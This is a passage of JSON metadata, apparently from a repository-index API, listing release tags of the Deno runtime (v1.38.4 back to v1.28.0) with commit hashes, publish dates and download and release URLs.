@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/G